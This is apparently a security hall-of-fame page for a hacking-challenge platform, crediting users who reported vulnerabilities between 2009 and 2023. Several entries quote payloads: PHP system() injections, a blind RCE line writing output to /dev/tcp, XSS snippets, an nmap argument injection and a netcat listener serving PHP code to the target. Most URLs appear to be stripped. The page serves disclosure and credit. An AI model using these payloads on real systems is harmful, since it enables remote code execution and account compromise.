Discovered Weaknesses


22/11/2023 Laluka

Has identified a stored XSS (through file upload) to RCE via code injection on the mediabox configuration. PHP code is reflected (json_dump) and then evaluated; the targeted account must be webmestre.

const form = doc.querySelector('form[action="/ecrire/?exec=configurer_mediabox"]');
const formData = new FormData(form);
formData.append("lity[<?php echo system(base64_decode('aWQ='));?>]", 42);

14/07/2023 Elweth

Detected a vulnerability in the version of Chrome Headless that bots use for Web-Client challenges. The version in question was vulnerable to CVE-2021-21224, which could lead to code execution in the bot’s environment.

27/08/2022 Laluka

Has identified a vulnerability where changing the status of the site’s content (doc, challenge, post, ...) to a higher level (e.g. from draft to evaluation or from trash to writing) triggers an email to be sent to the challenge author and/or webmaster. Some variables such as the title and content are not properly encoded or escaped before being passed to the eval function which renders the email. This allowed for a Blind-RCE to occur with a payload such as <?php system("bash -c 'id > /dev/tcp/'"); ?> in the title or content of the article.

  1. send(eval($email));

21/07/2022 Abyss Watcher & SpawnZii

have identified a remote code execution (RCE) vulnerability allowing a privileged user to execute PHP code: 9DIjt9'"><?php system('id;hostname;whoami');?>

11/07/2022 Abyss Watcher

identified a stored XSS vulnerability exploitable with an iframe hosted on RM domain :

<iframe src="">

17/03/2022 Mizu

identified a stored XSS vulnerability exploitable with an iframe hosted on a malicious domain starting with :

<iframe src="">

23/11/2021 zLade

identified a vulnerability allowing a member of the association to elevate his role to administrator simply by using the private interface of SPIP.

01/10/2021 Podalirius

identified a vulnerability allowing access to documents attached to solutions without restrictions :


15/05/2020 Laluka

identified multiples vulnerabilities : 3 reflected XSS, 2 SQLi and 1 RCE :;height:9999999px;%27%20foo='/><script>alert(document.domain)</script>,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--

12/01/2020 NonStandardModel

identified an XSS vulnerability in the name of the file imported on

04/06/2019 z6po

identified an XSS vulnerability. This one required a user intervention on the chatbox (a click on the previous page).,<script>alert(1)<%2Fscript>

04/06/2019 z6po

has identified a vulnerability allowing to kill, with an unprivileged user, the database available on the challenge01 server which hosts several challenges, by saturating the memory in a particular way in order to kill the process of his choice. This allowed to restart another binary instead listening on the same port via a race condition.

16/11/2018 Hacqueen

identified a vulnerability allowing to trap the users of the store through an iframe via a spreadshirt domain controlled by the attacker (e.g., the lang parameter was not filtered correctly.

12/04/2018 DrStache & urandom

identified a stored XSS vulnerability in the OSM map in the CTFATD rooms by injecting the following payload into the user’s bio (

<svg onload=console.log(document.domain)>

12/10/2015 ST4HLKR1EG

has identified an "Insecure Direct Object Reference" vulnerability allowing to read any private message :


03/2015 WtF

has identified a remote code execution (RCE) vulnerability in a challenge being evaluated on the production server, allowing it to access the file system with ssh and to execute commands.

03/2015 WtF

has identified an arbitrary file inclusion vulnerability (LFI) in the Path Truncation web-server challenge that allows it to read files from other challenges.

15/06/2013 LouTerrailloune

has identified a PHP code injection vulnerability on the "code - decode" page:

Text to decode in base64 :


06/11/2012 jimee

found several stored XSS in the user profile management :

<script>[code javascript/vbscript]</script>

20/03/2012 jimee

found a LFI in a challenge :

23/10/2011 courte66

found a reflected XSS in the "encode - decode" page :

Text to decode in base64


02/10/2011 Hypnoze

found a insecure indirect object references which lead to unauthorized access to all PM :[id_message_to_read]

11/07/2011 Armel

found a stored XSS on the chatbox.

<iframe src="javascript:[code javascript]' />

18/07/2011 g0uZ

found a PHP code injection vulnerability on the "online tools : nmap"

Host to scan in -sV mode :

--version-trace -p8888 [IP server attacker]

Service listening on attacker server

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

30/06/2011 elyfean

found a CSRF on the chatbox :

<form id="form" action="http//" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">

15/02/2011 EsSandre

found a LFI :

02/02/2011 hello

found several stored XSS in the PM system :

<script>[code javascript/vbscript]</script>

02/12/2009 real

found a code injection vulnerability :'.system('pwd').'